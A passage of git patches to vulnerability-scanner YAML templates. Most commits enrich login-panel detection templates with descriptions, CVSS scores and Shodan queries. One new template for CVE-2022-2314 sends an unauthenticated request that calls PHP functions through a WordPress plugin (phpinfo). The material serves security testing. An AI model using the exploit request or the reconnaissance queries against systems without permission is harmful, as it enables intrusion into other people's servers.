"{{BaseURL}}/{{Hostname}}/errors.log" + stop-at-first-match: true matchers-condition: and matchers: - type: word From 77b714964f776e7597929b37eb7be3e26966c06f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 09:40:41 +0000 Subject: [PATCH 1151/1415] Auto Generated CVE annotations [Thu Dec 8 09:40:41 UTC 2022] :robot: --- cves/2019/CVE-2019-6802.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-6802.yaml b/cves/2019/CVE-2019-6802.yaml index af9a49d03d..17c25558ee 100644 --- a/cves/2019/CVE-2019-6802.yaml +++ b/cves/2019/CVE-2019-6802.yaml @@ -9,11 +9,15 @@ info: reference: - https://vuldb.com/?id.130257 - https://nvd.nist.gov/vuln/detail/CVE-2019-6802 + - https://github.com/pypiserver/pypiserver/issues/237 classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2019-6802 + cwe-id: CWE-79,CWE-74 metadata: - verified: true shodan-query: html:"pypiserver" + verified: "true" tags: cve,cve2019,crlf,generic,pypiserver requests: From 1ffdff5b2d9c64ce7faef96b9305a6fad89024a4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 16:56:04 +0530 Subject: [PATCH 1152/1415] Update gradle-libs.yaml --- exposures/files/gradle-libs.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/files/gradle-libs.yaml b/exposures/files/gradle-libs.yaml index 5cd6243e8f..c1b0a846a7 100644 --- a/exposures/files/gradle-libs.yaml +++ b/exposures/files/gradle-libs.yaml @@ -1,9 +1,9 @@ id: gradle-libs info: - name: Gradle libs.versions.toml Disclosure + name: Gradle Library Version Disclosure author: DhiyaneshDK - severity: low + severity: info metadata: verified: true github-query: filename:libs.versions.toml From 1ecf1ad13a08cef90847b011b05516864a72d9fb Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 8 Dec 2022 08:42:03 -0500 Subject: [PATCH 1153/1415] Dashboard Content Enhancements (#6289) Dashboard Content Enhancements --- exposed-panels/asus-router-panel.yaml | 9 ++++++++- exposed-panels/backpack/backpack-admin-panel.yaml | 10 ++++++++-- exposed-panels/cisco/cisco-webvpn-detect.yaml | 9 ++++++++- exposed-panels/cudatel-panel.yaml | 9 ++++++++- exposed-panels/dradis-pro-panel.yaml | 9 ++++++++- exposed-panels/influxdb-panel.yaml | 10 ++++++++-- exposed-panels/mikrotik/mikrotik-routeros-old.yaml | 9 ++++++++- exposed-panels/oracle-people-sign-in.yaml | 11 +++++++++-- exposed-panels/orchid-vms-panel.yaml | 9 ++++++++- exposed-panels/osticket-panel.yaml | 9 ++++++++- exposed-panels/osticket/osticket-install.yaml | 9 ++++++++- exposed-panels/otobo-panel.yaml | 10 ++++++++-- exposed-panels/ourmgmt3-panel.yaml | 9 ++++++++- exposed-panels/pacs-connexion-utilisateur.yaml | 9 ++++++++- exposed-panels/panabit-panel.yaml | 9 ++++++++- exposed-panels/pandora-fms-console.yaml | 9 ++++++++- exposed-panels/parallels-html-client.yaml | 9 ++++++++- .../parallels/parallels-hsphere-detect.yaml | 9 ++++++++- exposed-panels/parse-dashboard.yaml | 9 ++++++++- .../payroll-management-system-panel.yaml | 9 ++++++++- exposed-panels/pega-web-panel.yaml | 10 ++++++++-- exposed-panels/pentaho-panel.yaml | 9 ++++++++- exposed-panels/persis-panel.yaml | 9 ++++++++- exposed-panels/pfsense-login.yaml | 10 ++++++++-- exposed-panels/pgadmin-exposure.yaml | 9 ++++++++- exposed-panels/phabricator-login.yaml | 9 ++++++++- exposed-panels/phoronix-pane.yaml | 9 ++++++++- exposed-panels/php-mailer.yaml | 9 ++++++++- exposed-panels/phpcollab-panel.yaml | 9 ++++++++- exposed-panels/phpldap-admin.yaml | 9 ++++++++- exposed-panels/phpminiadmin-panel.yaml | 10 ++++++++-- exposed-panels/phpmyadmin-panel.yaml | 9 ++++++++- exposed-panels/phppgadmin-panel.yaml | 10 ++++++++-- exposed-panels/pichome-panel.yaml | 9 ++++++++- exposed-panels/piwigo-panel.yaml | 9 ++++++++- exposed-panels/plastic-scm-login.yaml | 9 ++++++++- exposed-panels/plesk-obsidian-login.yaml | 9 ++++++++- exposed-panels/plesk-onyx-login.yaml | 9 ++++++++- exposed-panels/polycom-admin-detect.yaml | 9 ++++++++- exposed-panels/polycom-login.yaml | 9 ++++++++- exposed-panels/powerjob-panel.yaml | 9 ++++++++- exposed-panels/powerlogic-ion.yaml | 9 ++++++++- exposed-panels/privx-panel.yaml | 10 ++++++++-- exposed-panels/project-insight-login.yaml | 9 ++++++++- exposed-panels/projectsend-login.yaml | 9 ++++++++- exposed-panels/prometheus-exposed-panel.yaml | 11 +++++++++-- .../prometheus-pushgateway-exposed-panel.yaml | 10 ++++++++-- exposed-panels/pulse-secure-panel.yaml | 11 +++++++++-- exposed-panels/puppetboard-panel.yaml | 9 ++++++++- exposed-panels/pure-storage-login.yaml | 9 ++++++++- exposed-panels/pypicloud-panel.yaml | 11 +++++++++-- exposed-panels/qlik-sense-server.yaml | 10 ++++++++-- exposed-panels/qmail-admin-login.yaml | 9 ++++++++- exposed-panels/qnap/qnap-photostation-panel.yaml | 10 ++++++++-- exposed-panels/qnap/qnap-qts-panel.yaml | 10 ++++++++-- exposed-panels/qualcomm-voip-router.yaml | 11 +++++++++-- exposed-panels/qualtrics-login.yaml | 9 ++++++++- exposed-panels/quantum-scalar-detect.yaml | 9 ++++++++- exposed-panels/r-webserver-login.yaml | 12 ++++++++++-- exposed-panels/rabbitmq-dashboard.yaml | 9 ++++++++- exposed-panels/racksnet-login.yaml | 11 ++++++++--- exposed-panels/radius-manager.yaml | 9 ++++++++- exposed-panels/rancher-panel.yaml | 14 ++++++++++---- exposed-panels/raspberrymatic-panel.yaml | 9 ++++++++- exposed-panels/redash-panel.yaml | 9 ++++++++- exposed-panels/redis-commander-exposure.yaml | 9 ++++++++- exposed-panels/remkon-manager-panel.yaml | 9 ++++++++- exposed-panels/remote-ui-login.yaml | 9 ++++++++- exposed-panels/residential-gateway-login.yaml | 9 ++++++++- 69 files changed, 561 insertions(+), 92 deletions(-) diff --git a/exposed-panels/asus-router-panel.yaml b/exposed-panels/asus-router-panel.yaml index f4484d15dd..cb715acc21 100644 --- a/exposed-panels/asus-router-panel.yaml +++ b/exposed-panels/asus-router-panel.yaml @@ -1,9 +1,14 @@ id: asus-router-panel info: - name: Asus Router Login Panel + name: Asus Router Login Panel - Detect author: arafatansari severity: info + description: Asus router login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: 'Server: httpd/2.0 port:8080' @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/backpack/backpack-admin-panel.yaml b/exposed-panels/backpack/backpack-admin-panel.yaml index 13466bc0e1..d9ed1f6cf5 100644 --- a/exposed-panels/backpack/backpack-admin-panel.yaml +++ b/exposed-panels/backpack/backpack-admin-panel.yaml @@ -1,11 +1,15 @@ id: backpack-admin-panel info: - name: Backpack Admin Login Panel + name: Laravel Backpack Admin Login Panel - Detect author: shine severity: info description: | - An Backpack Admin dashboard was detected. + Laravel Backpack admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Backpack Admin" @@ -23,3 +27,5 @@ requests: - 'Backpack Admin' - 'backpack_alerts' condition: or + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/cisco/cisco-webvpn-detect.yaml b/exposed-panels/cisco/cisco-webvpn-detect.yaml index bf99b9b8b5..e73c9a7305 100644 --- a/exposed-panels/cisco/cisco-webvpn-detect.yaml +++ b/exposed-panels/cisco/cisco-webvpn-detect.yaml @@ -1,11 +1,16 @@ id: cisco-webvpn-detect info: - name: Cisco WebVPN Detect + name: Cisco WebVPN Panel - Detect author: ricardomaia severity: info + description: Cisco WebVPN panel was detected. reference: - https://askanydifference.com/difference-between-cisco-clientless-ssl-vpn-and-anyconnect-with-table/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true fofa-query: fid="U1TP/SJklrT9VLIEpZkQNg==" @@ -38,3 +43,5 @@ requests: - "webvpncontext=00@.+" - "webvpn=" condition: or + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/cudatel-panel.yaml b/exposed-panels/cudatel-panel.yaml index ebc753eefb..588c36bea8 100644 --- a/exposed-panels/cudatel-panel.yaml +++ b/exposed-panels/cudatel-panel.yaml @@ -1,9 +1,14 @@ id: cudatel-panel info: - name: CudaTel Login Panel + name: CudaTel Login Panel - Detect author: arafatansari severity: info + description: CudaTel login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"CudaTel" @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/dradis-pro-panel.yaml b/exposed-panels/dradis-pro-panel.yaml index 95f1daf795..08bbd51b14 100644 --- a/exposed-panels/dradis-pro-panel.yaml +++ b/exposed-panels/dradis-pro-panel.yaml @@ -1,11 +1,16 @@ id: dradis-pro-panel info: - name: Dradis Professional Edition Panel + name: Dradis Professional Edition Login Panel - Detect author: righettod severity: info + description: Dradis Professional Edition login panel was detected. reference: - https://dradisframework.com/ce/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Dradis Professional Edition" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/influxdb-panel.yaml b/exposed-panels/influxdb-panel.yaml index 0cde76ae6f..c99c861151 100644 --- a/exposed-panels/influxdb-panel.yaml +++ b/exposed-panels/influxdb-panel.yaml @@ -1,12 +1,16 @@ id: influxdb-panel info: - name: InfluxDB Detect + name: InfluxDB Admin Interface Panel - Detect author: pikpikcu,idealphase severity: info - description: Open Source Time Series Database, high-speed read and write database. + description: InfluxDB admin interface panel was detected. reference: - https://www.influxdata.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"InfluxDB - Admin Interface" tags: panel,influxdb @@ -32,3 +36,5 @@ requests: group: 1 regex: - 'InfluxDB<\/b> v([\d.]+)<\/p>' + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/mikrotik/mikrotik-routeros-old.yaml b/exposed-panels/mikrotik/mikrotik-routeros-old.yaml index 2915a28385..33c470794a 100644 --- a/exposed-panels/mikrotik/mikrotik-routeros-old.yaml +++ b/exposed-panels/mikrotik/mikrotik-routeros-old.yaml @@ -1,9 +1,14 @@ id: mikrotik-routeros-old info: - name: MikroTik RouterOS Administration Login + name: MikroTik RouterOS Admin Login Panel - Detect author: its0x08,DhiyaneshDk severity: info + description: MikroTik RouterOS admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"mikrotik routeros > administration" @@ -27,3 +32,5 @@ requests: group: 1 regex: - '
mikrotik routeros (.[0-9.]+) configuration page
' + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/oracle-people-sign-in.yaml b/exposed-panels/oracle-people-sign-in.yaml index 78ad5e5469..e631703255 100644 --- a/exposed-panels/oracle-people-sign-in.yaml +++ b/exposed-panels/oracle-people-sign-in.yaml @@ -1,9 +1,14 @@ id: oracle-people-sign-in info: - name: Oracle Peoplesoft Sign-in + name: Oracle PeopleSoft Login Panel - Detect author: idealphase severity: info + description: Oracle PeopleSoft login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Oracle PeopleSoft Sign-in" tags: oracle,panel @@ -26,4 +31,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/orchid-vms-panel.yaml b/exposed-panels/orchid-vms-panel.yaml index 25c54194cb..4e416160b1 100644 --- a/exposed-panels/orchid-vms-panel.yaml +++ b/exposed-panels/orchid-vms-panel.yaml @@ -1,9 +1,14 @@ id: orchid-vms-panel info: - name: Orchid Core VMS Panel Detect + name: Orchid Core VMS Panel - Detect author: princechaddha severity: info + description: Orchid Core VMS panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Orchid Core VMS" tags: panel,orchid @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/osticket-panel.yaml b/exposed-panels/osticket-panel.yaml index c70781f945..e5e3576a08 100644 --- a/exposed-panels/osticket-panel.yaml +++ b/exposed-panels/osticket-panel.yaml @@ -1,9 +1,14 @@ id: osticket-panel info: - name: OSTicket Panel Detect + name: osTicket Login Panel - Detect author: ritikchaddha severity: info + description: osTicket login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"powered by osTicket" @@ -30,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/osticket/osticket-install.yaml b/exposed-panels/osticket/osticket-install.yaml index d7c02ed402..599affb6d8 100644 --- a/exposed-panels/osticket/osticket-install.yaml +++ b/exposed-panels/osticket/osticket-install.yaml @@ -1,9 +1,14 @@ id: osticket-install info: - name: OSTicket Installation + name: osTicket Installer Panel - Detect author: ritikchaddha severity: high + description: osTicket installer panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"osTicket Installer" @@ -32,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/otobo-panel.yaml b/exposed-panels/otobo-panel.yaml index bc3f8054fc..bc2b7fcd8e 100644 --- a/exposed-panels/otobo-panel.yaml +++ b/exposed-panels/otobo-panel.yaml @@ -1,12 +1,16 @@ id: otobo-panel info: - name: OTOBO Login Panel + name: OTOBO Login Panel - Detect author: princechaddha severity: info - description: OTOBO is one of the most flexible web-based ticketing systems used for Customer Service, Help Desk, IT Service Management. + description: OTOBO login panel was detected. reference: - https://github.com/rotheross/otobo + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"otobo" tags: panel,otobo @@ -26,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/ourmgmt3-panel.yaml b/exposed-panels/ourmgmt3-panel.yaml index 18a5db8b3a..52d74b483c 100644 --- a/exposed-panels/ourmgmt3-panel.yaml +++ b/exposed-panels/ourmgmt3-panel.yaml @@ -1,9 +1,14 @@ id: ourmgmt3-panel info: - name: OurMGMT3 Admin Panel + name: OurMGMT3 Admin Login Panel - Detect author: ritikchaddha severity: info + description: OurMGMT3 admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"OurMGMT3" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/pacs-connexion-utilisateur.yaml b/exposed-panels/pacs-connexion-utilisateur.yaml index 4f7558b184..d61eb0a75a 100644 --- a/exposed-panels/pacs-connexion-utilisateur.yaml +++ b/exposed-panels/pacs-connexion-utilisateur.yaml @@ -1,9 +1,14 @@ id: gxd5-pacs-connexion-utilisateur info: - name: GXD5 Pacs Connexion utilisateur + name: GXD5 Pacs Connexion Login Panel - Detect author: dhiyaneshDK severity: info + description: GXD5 Pacs Connexion panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"GXD5 Pacs Connexion utilisateur" tags: panel,login @@ -22,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/panabit-panel.yaml b/exposed-panels/panabit-panel.yaml index 09efda928f..e246764ea8 100644 --- a/exposed-panels/panabit-panel.yaml +++ b/exposed-panels/panabit-panel.yaml @@ -1,9 +1,14 @@ id: panabit-panel info: - name: Panabit Panel Detect + name: Panabit Login Panel - Detect author: ffffffff0x severity: info + description: Panabit login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 reference: - https://www.panabit.com/ metadata: @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/pandora-fms-console.yaml b/exposed-panels/pandora-fms-console.yaml index 6beb1676e6..09e4209205 100644 --- a/exposed-panels/pandora-fms-console.yaml +++ b/exposed-panels/pandora-fms-console.yaml @@ -1,11 +1,16 @@ id: pandora-fms-console info: - name: Pandora FMS + name: Pandora FMS Mobile Console Login Panel - Detect author: dhiyaneshDk severity: info + description: Pandora FMS Mobile Console login panel was detected. reference: - https://www.exploit-db.com/ghdb/6827 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,edb requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/parallels-html-client.yaml b/exposed-panels/parallels-html-client.yaml index d55db4e436..cd4141ff08 100644 --- a/exposed-panels/parallels-html-client.yaml +++ b/exposed-panels/parallels-html-client.yaml @@ -1,9 +1,14 @@ id: parallels-html-client info: - name: Parallels HTML5 Client + name: Parallels HTML5 Client Login Panel - Detect author: pdteam severity: info + description: Parallels HTML5 Client login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel requests: @@ -15,3 +20,5 @@ requests: words: - "Parallels HTML5 Client" part: body + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/parallels/parallels-hsphere-detect.yaml b/exposed-panels/parallels/parallels-hsphere-detect.yaml index ac31366b02..7fa8bfe497 100644 --- a/exposed-panels/parallels/parallels-hsphere-detect.yaml +++ b/exposed-panels/parallels/parallels-hsphere-detect.yaml @@ -1,9 +1,14 @@ id: parallels-hsphere-detect info: - name: Parallels H-Sphere Detect + name: Parallels H-Sphere Login Panel - Detect author: ritikchaddha severity: info + description: Parallels H-Sphere login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Parallels H-Sphere" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/parse-dashboard.yaml b/exposed-panels/parse-dashboard.yaml index a73c49e2cd..769a66f69b 100644 --- a/exposed-panels/parse-dashboard.yaml +++ b/exposed-panels/parse-dashboard.yaml @@ -1,9 +1,14 @@ id: parse-dashboard info: - name: Parse Dashboard Exposure + name: Parse Dashboard Login Panel - Detect author: tess severity: info + description: Parse Dashboard login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Parse Dashboard" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/payroll-management-system-panel.yaml b/exposed-panels/payroll-management-system-panel.yaml index 362a091e74..ede6a15e98 100644 --- a/exposed-panels/payroll-management-system-panel.yaml +++ b/exposed-panels/payroll-management-system-panel.yaml @@ -1,9 +1,14 @@ id: payroll-management-system-panel info: - name: Payroll Management System Web Login Panel + name: Payroll Management System Web Login Panel - Detect author: idealphase severity: info + description: Payroll Management System Web login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"Admin | Employee's Payroll Management System" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/pega-web-panel.yaml b/exposed-panels/pega-web-panel.yaml index d6458abe6c..b673b32d37 100644 --- a/exposed-panels/pega-web-panel.yaml +++ b/exposed-panels/pega-web-panel.yaml @@ -1,13 +1,17 @@ id: pega-web-panel info: - name: Pega Infinity Web Login Panel + name: Pega Infinity Login Panel - Detect author: powerexploit,righettod severity: info description: | - Pega Infinity is CRM solution with robotic automation that is fully baked in.Which supports no code platform with robotic automation + Pega Infinity login panel was detected. reference: - https://www.pega.com/infinity + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Pega Platform" @@ -36,3 +40,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/pentaho-panel.yaml b/exposed-panels/pentaho-panel.yaml index 8dd42cf76a..e823cc843a 100644 --- a/exposed-panels/pentaho-panel.yaml +++ b/exposed-panels/pentaho-panel.yaml @@ -1,9 +1,14 @@ id: pentaho-panel info: - name: Pentaho Panel + name: Pentaho User Console Login Panel - Detect author: princechaddha,dhiyaneshDK severity: info + description: Pentaho User Console login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: pentaho tags: panel,pentaho @@ -17,3 +22,5 @@ requests: - type: word words: - 'Pentaho User Console - Login' + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/persis-panel.yaml b/exposed-panels/persis-panel.yaml index f9112c83cf..2fc2941311 100644 --- a/exposed-panels/persis-panel.yaml +++ b/exposed-panels/persis-panel.yaml @@ -1,11 +1,16 @@ id: persis-panel info: - name: Persis Panel + name: Persis Panel - Detect author: righettod severity: info + description: Persis panel was detected, reference: - https://www.persis.de/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Persis" @@ -38,3 +43,5 @@ requests: - 301 - 302 condition: or + +# Enhanced by md on 2022/12/05 diff --git a/exposed-panels/pfsense-login.yaml b/exposed-panels/pfsense-login.yaml index 115b15340f..e118e86385 100644 --- a/exposed-panels/pfsense-login.yaml +++ b/exposed-panels/pfsense-login.yaml @@ -1,13 +1,17 @@ id: pfsense-login info: - name: pfSense Login + name: pfSense Login Panel - Detect author: idealphase severity: info - description: free network firewall distribution, based on the FreeBSD operating system with a custom kernel and including third party free software packages for additional functionality. + description: pfSense login panel was detected. reference: - https://www.pfsense.org/download/ - https://www.pfsense.org/getting-started/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"pfSense - Login" google-query: intitle:"pfSense - Login" @@ -34,3 +38,5 @@ requests: group: 1 regex: - ' + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "")' + condition: and From 98e5d6f06f7fba0700d0d0c253354b6ee0d4b3a9 Mon Sep 17 00:00:00 2001 From: Aman Rawat <35992750+theamanrawat@users.noreply.github.com> Date: Mon, 12 Dec 2022 21:55:08 +0530 Subject: [PATCH 1244/1415] Create CVE-2022-2314.yaml --- cves/2022/CVE-2022-2314.yaml | 49 ++++++++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 cves/2022/CVE-2022-2314.yaml diff --git a/cves/2022/CVE-2022-2314.yaml b/cves/2022/CVE-2022-2314.yaml new file mode 100644 index 0000000000..f96dd66a19 --- /dev/null +++ b/cves/2022/CVE-2022-2314.yaml @@ -0,0 +1,49 @@ +id: CVE-2022-2314 + +info: + name: VR Calendar < 2.3.2 - Unauthenticated Arbitrary Function Call + author: theamanrawat + severity: critical + description: | + The VR Calendar WordPress plugin through 2.3.2 lets any user execute arbitrary PHP functions on the site. + reference: + - https://wpscan.com/vulnerability/b22fe77c-844e-4c24-8023-014441cc1e82 + - https://wordpress.org/plugins/vr-calendar-sync/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-2314 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-2314 + cwe-id: CWE-78 + metadata: + verified: "true" + tags: cve,cve2021,rce,wpscan,wordpress,wp-plugin,vr-calendar-sync,unauth + +requests: + - raw: + - | + GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1 + Host: {{Hostname}} + + - | + GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "phpinfo" + - "PHP Version" + condition: and + + - type: word + part: body_1 + words: + - "vrc-calendar" + + - type: status + status: + - 200 From 33698baf767a6e613ddd604f29fd789d15bd10df Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 21:56:13 +0530 Subject: [PATCH 1245/1415] Update icecast-server-detect.yaml --- technologies/icecast-server-detect.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/technologies/icecast-server-detect.yaml b/technologies/icecast-server-detect.yaml index addce85646..6f91d06cae 100644 --- a/technologies/icecast-server-detect.yaml +++ b/technologies/icecast-server-detect.yaml @@ -16,11 +16,6 @@ requests: matchers-condition: and matchers: - - type: word - part: body - words: - - 'Icecast Streaming Media Server' - - type: word part: header words: From 2fd1decf998e80362aec2ada0f6c483b74c153b3 Mon Sep 17 00:00:00 2001 From: Aman Rawat <35992750+theamanrawat@users.noreply.github.com> Date: Mon, 12 Dec 2022 21:56:22 +0530 Subject: [PATCH 1246/1415] Create easyscripts-installer.yaml --- .../installer/easyscripts-installer.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/installer/easyscripts-installer.yaml diff --git a/misconfiguration/installer/easyscripts-installer.yaml b/misconfiguration/installer/easyscripts-installer.yaml new file mode 100644 index 0000000000..3f98b6b4f4 --- /dev/null +++ b/misconfiguration/installer/easyscripts-installer.yaml @@ -0,0 +1,28 @@ +id: easyscripts-installer + +info: + name: Easyscripts Installer + author: theamanrawat + severity: high + metadata: + verified: true + shodan-query: http.title:"Installer - Easyscripts" + tags: easyscripts, installer + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Installer - Easyscripts' + - '/application/information/application/' + condition: and + + - type: status + status: + - 200 From b84d059fbdaacffb3ffb796b26840cf60509ffdd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 21:58:08 +0530 Subject: [PATCH 1247/1415] Update easyscripts-installer.yaml --- misconfiguration/installer/easyscripts-installer.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/misconfiguration/installer/easyscripts-installer.yaml b/misconfiguration/installer/easyscripts-installer.yaml index 3f98b6b4f4..5f0a97b15c 100644 --- a/misconfiguration/installer/easyscripts-installer.yaml +++ b/misconfiguration/installer/easyscripts-installer.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: http.title:"Installer - Easyscripts" - tags: easyscripts, installer + tags: misconfig,easyscripts,installer requests: - method: GET @@ -20,8 +20,6 @@ requests: part: body words: - 'Installer - Easyscripts' - - '/application/information/application/' - condition: and - type: status status: From 9225697d40d7649cfb0a786a96a7874f5cc12e65 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 22:01:49 +0530 Subject: [PATCH 1248/1415] Update 